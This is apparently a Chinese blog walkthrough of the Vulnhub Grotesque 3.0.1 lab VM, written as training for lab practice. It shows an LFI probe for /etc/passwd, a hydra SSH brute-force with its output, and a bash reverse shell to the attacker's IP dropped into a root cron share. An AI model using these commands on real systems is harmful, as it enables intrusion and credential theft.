AI 助理
备案控制台
开发者社区 安全 文章 正文

看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1

2023-10-30 163
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。


PS:这个是Grotesque系列一共有3个靶机,分别是1.2.3老样子需要获得root权限找到flag


Difficulty:medium

Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/grotesque/grotesque3.zip


Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。



①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

渗透机:kali IP :192.168.8.101 靶机IP :192.168.8.178


使用命令:nmap -sS -sV -n -T4 -p- 192.168.8.178

开启了22,80端口访问80,老样子扫描一下后台使用工具dirb,dirsearch,gobuster都没啥信息

网络异常,图片无法展示
|


这里看到一个超链接,点进去一张地图 既然后台扫不出那就换个思路找这个地图的信息 找到了md5


②:漏洞发现:

这里提示的是目录是md5加密的,所以需要生成一个加密的md5字典 使用命令:

for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dir.txt; done


然后需要把全部的 - 替换为 空格 然后在扫应该就能扫到目录了

 gobuster dir -u http://192.168.8.178 -w dir.txt -x php,html,txt,png,jpg,jpeg,css,js -b 403,404 -t 35 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.8.178
[+] Method:                  GET
[+] Threads:                 35
[+] Wordlist:                DIRMD5.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,png,jpg,jpeg,css,js,php,html
[+] Timeout:                 10s
===============================================================
2023/08/17 00:22:36 Starting gobuster in directory enumeration mode
===============================================================
/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]
Progress: 1978235 / 1985049 (99.66%)
===============================================================
2023/09/20 23:00:00 Finished
===============================================================



扫到了f66b22bf020334b04c7d0d3eb5010391.php进行访问,发现空白页

尝试一下ffuf模糊探测 得到:purpose

 ffuf -c -u http://192.168.8.178/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd -w /usr/share/wordlists/rockyou.txt -fs 0


163222e62c3f45adb62fbb31bccd1d50.png

③:LFI漏洞利用(本地文件包含漏洞):

这里检测一下 发现有个权限比较高得freddie用户 使用刚刚得md5字典进行爆破SSH密码

hydra -l freddie -P dirmd5.txt ssh://192.168.8.178 -t 20


2a3aecb8e7074a41968987afa09c0d6c.png


Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-20 23:22:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 220560 login tries (l:1/p:220560), ~13785 tries per task
[DATA] attacking ssh://192.168.1.49:22/
[STATUS] 142.00 tries/min, 142 tries in 00:01h, 220420 to do in 25:53h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 220266 to do in 37:13h, 14 active
[STATUS] 92.29 tries/min, 646 tries in 00:07h, 219916 to do in 39:43h, 14 active
[STATUS] 2.39 tries/min, 675 tries in 04:42h, 219887 to do in 1535:47h, 14 active
[STATUS] 7.03 tries/min, 2101 tries in 04:58h, 218461 to do in 517:57h, 14 active
[22][ssh] host: 192.168.1.49   login: freddie   password: 61a4e3e60c063d1e472dd780f64e6cad
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-20 23:24:23


得到密码为:61a4e3e60c063d1e472dd780f64e6cad

④:SSH登入:
ssh freddie@192.168.8.178


1425968a6038483ab96c63b926bc1a25.png

先拿到个flag

⑤:提权:

又到了提权阶段了 sudo -lfind / -perm -u=s -type f 2>/dev/null 都没有可以利用的信息。

ss -tulpn 查看用户开放发那些端口这里发现 开启了445 SMB服务 文件共享


smbclient -L 127.0.0.1 登入发现了一个grotesque的文件,没有可以利用的信息。


这个时候可以上传一个pspy64 看看说不定有什么定时任务呢 🆗 我们继续信息收集一波!


pspy64下载:网上有很多,为了完美这里放个链接方便大家 直接下载


要先把这个pspy64传入靶机 先下载 然后 python3 -m http.server 6789 开启临时网页 wget下载

wget http://192.168.8.101:6789/pspy64s #下载
chmod 777  pspy64s  #赋予权限

cbc3fc73351f42c2b5bc94e1884f0f87.pngc99c66b3bdf149fb8f8ffc76218c45a4.png

发现 root用户在用bash这个命令去执行smbshare文件夹下面的sh文件

既然这样那我们是不是可以尝试写一个反弹shell 放到smb下面 过一会就会执行命令!

#!/bin/bash
sh -i >& /dev/tcp/192.168.8.101/1111 0>&1  # 记住是本机ip哈 别搞错了不然弹不上


80754d81ed2041a4a51f1970cf004a18.png


再次登入 smbclient //127.0.0.1/grotesque 然后使用putshell.sh 传上去 需要等一下才会回弹

⑥:获取FLAG:


PS:又是一篇肝到凌晨的文章,希望以后回来看看都是回忆

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:


1.信息收集 dirb,dirsearch,gobuster后台扫描工具(老生常谈 了)

2.for 生成MD5字典 (新知识点)

3.ffuf模糊探测,hydra爆破工具的使用,LFI漏洞利用

4.提权得信息收集,pspy64的使用,反弹sh的脚本编写 以及文件的上传下载 wget 和put


Grotesque系列的最后一个靶机这个系列又完结啦,学习到了很多知识点又是收获满满的一天

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

文章标签:
网络安全
安全
Shell
数据安全/隐私保护
定位技术
关键词:
渗透测试vulnhub
测试靶机vulnhub
渗透测试靶机vulnhub
渗透测试靶机
渗透测试靶机vulnhub grotesque
落寞的鱼
目录
相关文章
XPcode7
|
4月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
XPcode7
139 0
XPcode7
|
4月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
XPcode7
78 0
XPcode7
|
4月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
XPcode7
61 0
XPcode7
|
4月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
XPcode7
47 0
XPcode7
|
4月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
XPcode7
156 0
落寞的鱼
|
11月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
落寞的鱼
265 0
落寞的鱼
|
11月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
落寞的鱼
151 0
沐尘而生
|
12月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
沐尘而生
358 0
geeksongs
|
前端开发 Linux 网络安全
kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示:   因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。
geeksongs
2285 0
yuanfan_2012
|
4月前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
yuanfan_2012
187 0

热门文章

最新文章

  • 1
    CentOS Linux 8使用阿里源(安装jdk11、git测试)
  • 2
    RocketMQ搭建并测试(windows)
  • 3
    maven跳过测试清理、打包、安装
  • 4
    自动化测试谷歌浏览器和其驱动版本差不多却还是报错The chromedriver version (121.0.6167.184) detected in PATH at DPythonchromed
  • 5
    springboot测试断言工具类Assertions
  • 6
    软件测试之 性能测试 性能测试基础指标 Loadrunner、Jmeter等工具(上)
  • 7
    Springboot用JUnit测试接口时报错Failed to determine a suitable driver class configure a DataSource: ‘url‘
  • 8
    探索自动化测试的未来:AI与机器学习的融合之路
  • 9
    《手把手教你》系列基础篇(八十一)-java+ selenium自动化测试-框架设计基础-TestNG如何暂停执行一些case(详解教程)
  • 10
    软件测试之 性能测试 性能测试基础指标 Loadrunner、Jmeter等工具(下)
  • 1
    记录VulnHub 靶场——Escalate_Linux渗透测试过程
    78
  • 2
    VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
    61
  • 3
    基于Vulnhub—DC8靶场渗透测试过程
    47
  • 4
    基于Vulnhub靶场—DC4渗透测试过程
    139
  • 5
    基于Vulnhub靶场之DC-3渗透测试过程
    156
  • 6
    渗透测试工程师面试题大全
    111
  • 7
    API 渗透测试 4 个关键步骤
    187
  • 8
    图形化渗透测试工具 -- GUI_Tools
    140
  • 9
    Kali下安装渗透测试常用工具dnsx和dirsearch
    187
  • 10
    深入Kali Linux:高级渗透测试技术详解
    398

    • 相关课程

    更多
  • MSE微服务测试最佳实践 - 自动化回归
  • 网络安全攻防 - Web渗透测试

    • 相关电子书

    更多
  • 移动互联网测试到质量的转变
  • 给ITer的技术实战进阶课-阿里CIO学院独家教材(四)
  • F2etest — 多浏览器兼容性测试整体解决方案

    • 相关实验场景

    更多
  • 快速上手并跑通AnalyticDB PostgreSQL版TPC-H测试
  • 极致弹性的PolarDB Serverless确保数据业务持续在线
    • 下一篇
    云函数